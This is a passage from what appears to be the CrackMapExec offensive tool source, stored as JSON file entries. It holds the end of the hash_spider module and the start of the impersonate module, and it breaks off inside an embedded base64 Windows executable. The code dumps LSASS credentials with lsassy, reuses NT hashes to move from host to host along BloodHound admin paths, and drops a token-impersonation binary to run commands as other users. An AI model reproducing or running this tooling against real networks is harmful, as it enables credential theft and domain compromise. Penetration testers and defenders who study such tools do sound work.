in admin_access:\n if user[0] in pc[1]:\n cursor.execute(f\"SELECT * FROM pc_and_admins WHERE pc_name = '{pc[0]}' AND dumped NOT LIKE 'TRUE'\")\n more_to_dump = cursor.fetchall()\n if len(more_to_dump) > 0:\n context.log.display(f\"User {user[0]} has more access to {pc[0]}. Attempting to dump.\")\n connection.domain = user[0].split(\"@\")[1]\n setattr(connection, \"host\", pc[0].split(\".\")[0])\n setattr(connection, \"username\", user[0].split(\"@\")[0])\n setattr(connection, \"nthash\", user[1])\n setattr(connection, \"nthash\", user[1])\n try:\n self.run_lsassy(context, connection, cursor)\n cursor.execute(\"UPDATE pc_and_admins SET dumped = 'TRUE' WHERE pc_name LIKE '\" + pc[0] + \"%'\")\n\n process_creds(\n context,\n connection,\n credentials_data,\n dbconnection,\n cursor,\n driver,\n )\n self.spider_pcs(context, connection, cursor, dbconnection, driver)\n except Exception:\n context.log.fail(f\"Failed to dump lsassy on {pc[0]}\")\n if len(admin_access) > 0:\n context.log.fail(\"No more local admin access known. Please try re-running Bloodhound with newly found accounts.\")\n exit()\n\n def on_admin_login(self, context, connection):\n db_path = connection.config.get(\"CME\", \"workspace\")\n # DB will be saved at ./CrackMapExec/hash_spider_default.sqlite3 if workspace in cme.conf is \"default\"\n db_name = f\"hash_spider_{db_path}.sqlite3\"\n dbconnection = connect(db_name, check_same_thread=False, isolation_level=None)\n\n cursor = dbconnection.cursor()\n if self.reset:\n try:\n cursor.execute(\"DROP TABLE IF EXISTS admin_users;\")\n cursor.execute(\"DROP TABLE IF EXISTS pc_and_admins;\")\n context.log.display(\"Database reset\")\n exit()\n except Exception as e:\n context.log.fail(\"Database reset error\", str(e))\n exit()\n\n if self.reset_dumped:\n try:\n cursor.execute(\"UPDATE pc_and_admins SET dumped = 'False'\")\n context.log.display(\"PCs can be dumped again.\")\n except Exception as e:\n context.log.fail(\"Database update error\", str(e))\n exit()\n\n neo4j_user = connection.config.get(\"BloodHound\", \"bh_user\")\n neo4j_pass = connection.config.get(\"BloodHound\", \"bh_pass\")\n neo4j_uri = connection.config.get(\"BloodHound\", \"bh_uri\")\n neo4j_port = connection.config.get(\"BloodHound\", \"bh_port\")\n neo4j_db = f\"bolt://{neo4j_uri}:{neo4j_port}\"\n driver = GraphDatabase.driver(neo4j_db, auth=basic_auth(neo4j_user, neo4j_pass), encrypted=False)\n neo4j_conn(context, connection, driver)\n neo4j_local_admins(context, driver)\n create_db(admin_results, dbconnection, cursor)\n initial_run(connection, cursor)\n context.log.display(\"Running lsassy\")\n self.run_lsassy(context, connection, cursor)\n process_creds(context, connection, credentials_data, dbconnection, cursor, driver)\n context.log.display(\"🕷️ Starting to spider 🕷️\")\n self.spider_pcs(context, connection, cursor, dbconnection, driver)\n" }, { "path": "cme/modules/impersonate.py", "content": "# Impersonate module for CME \n# Author of the module : https://twitter.com/Defte_\n# Impersonate: https://github.com/sensepost/Impersonate\n# Token manipulation blog post https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/\n\nfrom base64 import b64decode\nfrom sys import exit\nfrom os import path\n\nclass CMEModule:\n\n name = \"impersonate\"\n description = \"List and impersonate tokens to run command as locally logged on users\"\n supported_protocols = [\"smb\"]\n opsec_safe = True # could be flagged\n multiple_hosts = True\n\n def options(self, context, module_options):\n '''\n TOKEN // Token id to usurp\n EXEC // Command to exec\n IMP_EXE // Path to the Impersonate binary on your local computer\n '''\n\n self.tmp_dir = \"C:\\\\Windows\\\\Temp\\\\\"\n self.share = \"C$\"\n self.tmp_share = self.tmp_dir.split(\":\")[1]\n self.impersonate = \"Impersonate.exe\"\n self.useembeded = True\n self.token = self.cmd = \"\"\n self.impersonate_embedded = b64decode(\"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